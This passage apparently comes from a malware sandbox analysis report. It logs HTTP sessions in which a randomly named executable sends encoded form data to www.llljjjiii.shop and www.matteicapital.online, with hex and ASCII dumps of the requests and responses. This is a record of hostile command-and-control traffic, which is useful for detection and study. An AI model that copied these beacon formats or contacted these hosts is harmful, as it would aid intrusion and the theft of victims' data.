                                                                                                                        Data Ascii: bBw=SoNrVhZITNTyHgMdrF5hvRfNawPIMKch3a7VkrZpD06fpfmPX2mopfrl3WdJYtMlOVKTmzGJQubQ+gQlil643yjWMCWtGWWEJizE45+XPhw7BUm69H1lUqKxI58IR+OmeipaxotHUKH/L5WIv/HBHd1D/DSyWiu0k0fZdZDsOIrsP1AptuAqXOzLp8GQLFxR5U1y7Yz+rpo4Ia8lkIOdvhcTaQyLtIogCfA75KZct1HxjvzX5OtTqMecYAlPi5B2gsFwf+sYhRxw5j3orJ0g1fUfsRs+4h1uqw2KoXZQ/hWrXurAtRIBbzJIzaQWSKpD57LF9MnNhZIThBCwZNNy+2nld3YnxJf+v7Qx9WHD7h1pAIoMZaugBhOk1PQ39GitvKalCc40dzHtmgFZ/07fZdAeR165kDcYk9psdHN48ZuRTOP/TkXqoqKDL6QWrq23BvLm/XSz5XMLetyNYqBlrPt0Fl1ZbJZ48a4edm8CBvGxHQE3ex08SOWohAh/gfjiuGRZdB7CmixtazcaPreLmUYJpRxgDXsj5Un4Fqban7UshoP9oAUgngMyDl3VwRQ+o5+AFLbdkegVRkupdZOInEJoGwLX8Gkw3FDlBNgXAEQhdAXeRjw8f3ULjurNpz8mq7lAEKl63jarZMYEsvax5Fh2f0rKhunVA8bUn5mRO4OIbTRFXP5snrt1LrxArplUS/q2xCFTdIiHV5EuT7IXlzqAui0OY16lT7txYmllpqsnw9S9NosPbriLCErLN4Ol5LHJRRs38dcA9LkNtsGbWnpsJuMOzmvBkbS9yLEkRqvZDwXFxhkiFSrH6f/5LUgvj+EQH/wjgSmEHK3chlZSl4mPsW8X/RNoufu79WK4DpNFJVEmrEjNXoYuaS+nkxMuZZzaF9FCPSM7hS0oTpoXlLbe0jrbxKZp+54sfg4vXyz5kX12fDMSlLk/fQK/l5gz4GywRJPU1t2Fay6N/uuWN2/iltlSpoYzrHWMN7IPa8TSmAPx [TRUNCATED]


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        24192.168.2.949998208.91.197.27806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:22:17.631289959 CET346OUTGET /hyyd/?PBk=f4VDN8Bp14IhbV&bBw=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX3VjmPRmhRH/ifjHqvJrHFSE8BVe6vQ== HTTP/1.1
                                                                                                                        Host: www.matteicapital.online
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:22:19.788412094 CET1236INHTTP/1.1 200 OK
                                                                                                                        Date: Thu, 21 Nov 2024 15:22:18 GMT
                                                                                                                        Server: Apache
                                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                                        Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                        Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                        Set-Cookie: vsid=902vr47974813892446974; expires=Tue, 20-Nov-2029 15:22:18 GMT; Max-Age=157680000; path=/; domain=www.matteicapital.online; HttpOnly
                                                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Z8A/shAM+EFk00uuoHgm1q2BAzBXVVBufY4XReFIIGQ2fKEcBbhyV/u5lXjJ2pHwBya7gygSKxW15DdxRB+4+Q==
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 31 38 33 64 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e
                                                                                                                        Data Ascii: 183d9<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.
                                                                                                                        Nov 21, 2024 16:22:19.788438082 CET1236INData Raw: 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61
                                                                                                                        Data Ascii: net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid"
                                                                                                                        Nov 21, 2024 16:22:19.788454056 CET1236INData Raw: 6e 63 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72
                                                                                                                        Data Ascii: nction(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="langu
                                                                                                                        Nov 21, 2024 16:22:19.788465977 CET1236INData Raw: 61 6e 67 75 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e
                                                                                                                        Data Ascii: anguages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.ha
                                                                                                                        Nov 21, 2024 16:22:19.788479090 CET1236INData Raw: 26 22 2b 68 2e 63 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f
                                                                                                                        Data Ascii: &"+h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}e
                                                                                                                        Nov 21, 2024 16:22:19.788491964 CET1236INData Raw: 73 5b 62 5d 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 64 69
                                                                                                                        Data Ascii: s[b]){if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAtt
                                                                                                                        Nov 21, 2024 16:22:19.788506031 CET1236INData Raw: 61 70 70 6c 79 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 7c 7c 61 5b 30 5d 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 63 6d 70 2e 61
                                                                                                                        Data Ascii: apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppV
                                                                                                                        Nov 21, 2024 16:22:19.788547993 CET1236INData Raw: 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 53 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 46 69 65 6c 64 22 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 65 6c 73 65 7b 5f 5f 67 70 70 2e 71 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e
                                                                                                                        Data Ascii: ection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object
                                                                                                                        Nov 21, 2024 16:22:19.788564920 CET1236INData Raw: 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 28 61 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70
                                                                                                                        Data Ascii: ow.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addE
                                                                                                                        Nov 21, 2024 16:22:19.788578033 CET1236INData Raw: 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68
                                                                                                                        Data Ascii: ript type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.matteicapital.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.matteicapital.online/px.js?ch=2"></script><script type="text/j
                                                                                                                        Nov 21, 2024 16:22:19.908343077 CET1236INData Raw: 33 35 38 32 38 36 22 2c 78 70 69 64 3a 22 56 77 4d 50 55 31 35 56 47 77 49 46 55 46 52 58 42 67 49 47 55 46 45 3d 22 2c 6c 69 63 65 6e 73 65 4b 65 79 3a 22 36 62 63 31 37 35 65 31 63 38 22 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 44 3a 22 31 35 34
                                                                                                                        Data Ascii: 358286",xpid:"VwMPU15VGwIFUFRXBgIGUFE=",licenseKey:"6bc175e1c8",applicationID:"1545513165"};;/*! For license information please see nr-loader-spa-1.273.1.min.js.LICENSE.txt */(()=>{var e,t,r={8122:(e,t,r)=>{"use strict";r.d(t,{a:()=>i});var n


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        25192.168.2.9499998.210.114.150806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:22:26.380956888 CET598OUTPOST /rsvy/ HTTP/1.1
                                                                                                                        Host: www.llljjjiii.shop
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.llljjjiii.shop
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.llljjjiii.shop/rsvy/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 33 4b 49 67 36 67 64 6b 34 54 50 67 68 67 43 44 55 7a 30 42 6f 6e 7a 50 46 35 63 4d 31 5a 6a 77 31 56 77 49 50 6b 54 45 34 63 66 42 4d 57 30 52 4a 58 4e 37 4f 67 65 2b 61 57 48 62 79 43 33 6a 45 72 45 62 6d 75 31 49 42 76 36 52 79 30 6f 66 39 53 66 69 35 6a 36 37 34 61 48 32 62 65 79 55 43 77 59 72 36 31 68 34 73 63 6f 4c 5a 2f 74 74 30 63 43 30 6f 30 36 6c 55 64 36 78 33 38 39 6c 30 58 32 58 6e 66 64 34 50 6d 39 56 6a 36 62 7a 31 55 74 4f 49 36 36 69 2b 71 78 68 4a 39 35 55 77 55 52 34 52 53 4c 6f 53 70 4c 31 6e 2f 6f 66
                                                                                                                        Data Ascii: bBw=m+7KIMtJ4/BT3KIg6gdk4TPghgCDUz0BonzPF5cM1Zjw1VwIPkTE4cfBMW0RJXN7Oge+aWHbyC3jErEbmu1IBv6Ry0of9Sfi5j674aH2beyUCwYr61h4scoLZ/tt0cC0o06lUd6x389l0X2Xnfd4Pm9Vj6bz1UtOI66i+qxhJ95UwUR4RSLoSpL1n/of
                                                                                                                        Nov 21, 2024 16:22:27.993083954 CET925INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:22:27 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Set-Cookie: PHPSESSID=kgacm9v10j5g32gd5oelf2kem6; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                        Pragma: no-cache
                                                                                                                        Set-Cookie: sessionid=kgacm9v10j5g32gd5oelf2kem6; expires=Sun, 19-Nov-2034 15:22:27 GMT; Max-Age=315360000; path=/
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 31 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 52 d9 6e 9c 30 14 7d cf 57 dc 3a aa e6 25 06 66 49 53 61 20 52 22 e5 b1 ff 70 31 0e 78 e2 85 da 66 02 fd fa 1a 33 5d 22 e5 ed de e3 63 9f 45 ae 86 a0 55 73 53 0d 02 bb e6 06 a0 d2 22 20 18 d4 a2 26 17 29 de 47 eb 02 01 6e 4d 10 26 d4 e4 5d 76 61 a8 3b 71 91 5c d0 b4 dc 49 23 83 44 45 3d 47 25 ea fd 9d 8e 80 9e f4 bf 1d e7 0f fb e4 85 4b 87 d8 46 be b1 04 f2 24 ec b9 93 63 00 ef 78 4d f2 71 6a 95 e4 f9 19 2f b8 e1 f9 f9 e7 24 dc 42 0f d9 21 3b 66 51 23 3b fb c7 4b 4d 00 c2 32 46 af 41 cc e1 3f 3a 69 aa 7c bb 18 b3 e5 5b b8 aa b5 dd 02 3e 2c 51 96 b4 c8 df 7a 67 27 d3 51 6e 95 75 25 dc 7e eb f0 9e 1f 19 89 37 a4 ee af c4 9d c6 79 0b 5a c2 a9 28 c6 99 a5 d4 25 ec 8b e2 2b 1b ad 8f e1 ad 29 01 5b 6f d5 14 04 73 b2 1f 42 09 05 0b 76 2c e1 18 49 4a bc 26 40 a3 eb 65 a4 16 80 53 b0 6c f7 31 aa d4 d8 8b fc 54 9c b2 d1 f4 24 56 52 7d a1 b4 1a f6 7f 7c 5c 65 37 0f 9f e8 6e af d3 4d 8c 1e 92 d5 2b 96 9c d0 ef 2b 92 c6 fb bf a6 d6 a9 93 7e 54 b8 94 d0 2a cb df d8 [TRUNCATED]
                                                                                                                        Data Ascii: 18dmRn0}W:%fISa R"p1xf3]"cEUsS" &)GnM&]va;q\I#DE=G%KF$cxMqj/$B!;fQ#;KM2FA?:i|[>,Qzg'Qnu%~7yZ(%+)[osBv,IJ&@eSl1T$VR}|\e7nM++~T*/*M'}yzx~xfkcp&r6Z&kka~1h0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        26192.168.2.9500008.210.114.150806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:22:29.046588898 CET622OUTPOST /rsvy/ HTTP/1.1
                                                                                                                        Host: www.llljjjiii.shop
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.llljjjiii.shop
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.llljjjiii.shop/rsvy/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 32 71 34 67 38 42 64 6b 36 7a 50 2f 75 41 43 44 4f 44 30 64 6f 6e 76 50 46 38 39 58 31 4d 37 77 30 78 30 49 4f 6c 54 45 2f 63 66 42 45 32 30 55 4e 58 4e 77 4f 67 54 42 61 58 37 62 79 43 7a 6a 45 6f 51 62 6e 64 64 4c 51 76 36 54 72 6b 6f 64 7a 79 66 69 35 6a 36 37 34 65 58 59 62 65 61 55 43 68 49 72 37 58 5a 2f 33 38 6f 49 4a 50 74 74 6a 4d 44 39 6f 30 36 54 55 59 62 61 33 35 35 6c 30 57 47 58 6d 4b 78 33 45 6d 39 54 2b 4b 62 69 79 48 63 64 47 36 53 6d 77 61 70 34 59 63 52 7a 7a 31 74 6d 41 67 43 7a 48 2b 4c 53 67 59 68 33 55 36 7a 33 47 34 63 63 75 38 36 53 56 49 69 78 75 70 67 50 6c 51 3d 3d
                                                                                                                        Data Ascii: bBw=m+7KIMtJ4/BT2q4g8Bdk6zP/uACDOD0donvPF89X1M7w0x0IOlTE/cfBE20UNXNwOgTBaX7byCzjEoQbnddLQv6Trkodzyfi5j674eXYbeaUChIr7XZ/38oIJPttjMD9o06TUYba355l0WGXmKx3Em9T+KbiyHcdG6Smwap4YcRzz1tmAgCzH+LSgYh3U6z3G4ccu86SVIixupgPlQ==
                                                                                                                        Nov 21, 2024 16:22:30.586858988 CET925INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:22:30 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Set-Cookie: PHPSESSID=rc1r48bau6jdvciupgv89fs656; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                        Pragma: no-cache
                                                                                                                        Set-Cookie: sessionid=rc1r48bau6jdvciupgv89fs656; expires=Sun, 19-Nov-2034 15:22:30 GMT; Max-Age=315360000; path=/
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 31 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 52 d9 6e 9c 30 14 7d cf 57 dc 3a aa e6 25 06 66 49 53 61 20 52 22 e5 b1 ff 70 31 0e 78 e2 85 da 66 02 fd fa 1a 33 5d 22 e5 ed de e3 63 9f 45 ae 86 a0 55 73 53 0d 02 bb e6 06 a0 d2 22 20 18 d4 a2 26 17 29 de 47 eb 02 01 6e 4d 10 26 d4 e4 5d 76 61 a8 3b 71 91 5c d0 b4 dc 49 23 83 44 45 3d 47 25 ea fd 9d 8e 80 9e f4 bf 1d e7 0f fb e4 85 4b 87 d8 46 be b1 04 f2 24 ec b9 93 63 00 ef 78 4d f2 71 6a 95 e4 f9 19 2f b8 e1 f9 f9 e7 24 dc 42 0f d9 21 3b 66 51 23 3b fb c7 4b 4d 00 c2 32 46 af 41 cc e1 3f 3a 69 aa 7c bb 18 b3 e5 5b b8 aa b5 dd 02 3e 2c 51 96 b4 c8 df 7a 67 27 d3 51 6e 95 75 25 dc 7e eb f0 9e 1f 19 89 37 a4 ee af c4 9d c6 79 0b 5a c2 a9 28 c6 99 a5 d4 25 ec 8b e2 2b 1b ad 8f e1 ad 29 01 5b 6f d5 14 04 73 b2 1f 42 09 05 0b 76 2c e1 18 49 4a bc 26 40 a3 eb 65 a4 16 80 53 b0 6c f7 31 aa d4 d8 8b fc 54 9c b2 d1 f4 24 56 52 7d a1 b4 1a f6 7f 7c 5c 65 37 0f 9f e8 6e af d3 4d 8c 1e 92 d5 2b 96 9c d0 ef 2b 92 c6 fb bf a6 d6 a9 93 7e 54 b8 94 d0 2a cb df d8 [TRUNCATED]
                                                                                                                        Data Ascii: 18dmRn0}W:%fISa R"p1xf3]"cEUsS" &)GnM&]va;q\I#DE=G%KF$cxMqj/$B!;fQ#;KM2FA?:i|[>,Qzg'Qnu%~7yZ(%+)[osBv,IJ&@eSl1T$VR}|\e7nM++~T*/*M'}yzx~xfkcp&r6Z&kka~1h0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        27192.168.2.9500018.210.114.150806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:22:31.728079081 CET1635OUTPOST /rsvy/ HTTP/1.1
                                                                                                                        Host: www.llljjjiii.shop
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.llljjjiii.shop
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.llljjjiii.shop/rsvy/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 32 71 34 67 38 42 64 6b 36 7a 50 2f 75 41 43 44 4f 44 30 64 6f 6e 76 50 46 38 39 58 31 4d 7a 77 30 43 38 49 50 47 37 45 2b 63 66 42 4b 57 30 56 4e 58 4e 58 4f 67 4c 46 61 58 33 74 79 41 62 6a 65 4b 49 62 76 49 70 4c 5a 76 36 54 6b 45 6f 41 39 53 65 36 35 6a 71 2f 34 61 7a 59 62 65 61 55 43 6a 67 72 76 31 68 2f 31 38 6f 4c 5a 2f 74 78 30 63 43 59 6f 77 57 44 55 59 66 73 33 4e 4e 6c 7a 32 57 58 71 63 46 33 4a 6d 39 52 39 4b 61 2f 79 48 52 46 47 36 65 71 77 61 64 43 59 62 39 7a 6a 53 45 48 43 53 47 2f 65 76 62 7a 6c 49 52 4c 4e 75 37 4e 4a 62 77 61 2f 39 61 66 42 71 4c 32 76 34 30 46 79 39 50 46 61 6d 52 48 2b 68 63 70 38 58 53 6c 53 48 50 4a 58 76 38 65 4d 50 61 5a 2f 76 51 67 6f 72 54 62 70 66 77 78 6f 51 69 4d 6f 66 42 6f 4c 37 66 59 2f 38 48 7a 75 64 59 4b 73 77 4d 63 4b 50 55 57 31 6d 74 73 79 52 37 66 52 6a 72 4e 73 6a 62 73 4e 49 54 31 42 72 33 76 51 31 71 4f 33 58 4a 62 45 2b 63 32 4e 39 48 44 48 45 61 38 4e 6e 39 6e 53 39 6a 6d 31 6b 30 4e 65 7a [TRUNCATED]
                                                                                                                        Data Ascii: bBw=m+7KIMtJ4/BT2q4g8Bdk6zP/uACDOD0donvPF89X1Mzw0C8IPG7E+cfBKW0VNXNXOgLFaX3tyAbjeKIbvIpLZv6TkEoA9Se65jq/4azYbeaUCjgrv1h/18oLZ/tx0cCYowWDUYfs3NNlz2WXqcF3Jm9R9Ka/yHRFG6eqwadCYb9zjSEHCSG/evbzlIRLNu7NJbwa/9afBqL2v40Fy9PFamRH+hcp8XSlSHPJXv8eMPaZ/vQgorTbpfwxoQiMofBoL7fY/8HzudYKswMcKPUW1mtsyR7fRjrNsjbsNIT1Br3vQ1qO3XJbE+c2N9HDHEa8Nn9nS9jm1k0NezUwKblbHr4U9x1x1wqMjEj1cENApSGLFAPkM9q+dCu8TiLlk9/b+sK7+wNvT2ALQsQYxIhDQfq2Da0pfEfcO3Pu/whBb4AUjNulZHekub3Wv1NEyiJvlEbAxbdnxDAuKe/H0mYMe2A2SPOwDXtOEakhgrHDcAuayZrxb1d1+2kt3h9yj0rnLMofCj2BYsA8fKUkoWNUsO45ynJwUXXiAiULYrIv34WH37WlF0wHSxRoMlfHjyvoVsGrFft3dMOthaTenyCu+RPAqbRkbyQ8m2BuFO+KdGa2XfPuVKteqXLvRZwk4v5vbX09gYmT0j2N3ZMz9bV90W9x6fbXSaiztBj89y5iyYiTDIU8jP15kvk0NtJYl29FNuJzFdXUfkbZ+OSA3TVvbZWh2fBRUxBQjBRd0ciHzENZsl8E60fUi0x/fO6Gfi/EyQHHex5cDx1k2Cil9xhuvXfjycoHnvt8s6g3wjfFRX6E5LvEK5bLAlgrarE4RibKJdZ+oEIow//x+Frkt23yL1ECU9sqI/t1XtND+ClhNABVsunSMvvEAjfbMummsVZolMT0jILLNc3omjCTQZjj5QIiyp5fPY8rOUs+4i3d1o64tKbYDNXFZxWAtxk2lo+OWRCFYRiohpSwZuuLraigitU+hadGWR7C/sWDlFVFECQB/qVr [TRUNCATED]


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        28192.168.2.9500028.210.114.150806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:22:34.382836103 CET340OUTGET /rsvy/?bBw=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rQpb0mRwFlkiYxCOBwbKBY/Wtalppug==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.llljjjiii.shop
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:22:35.934837103 CET1120INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:22:35 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Set-Cookie: PHPSESSID=l3f38bf2go89nh2na4t17evr50; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
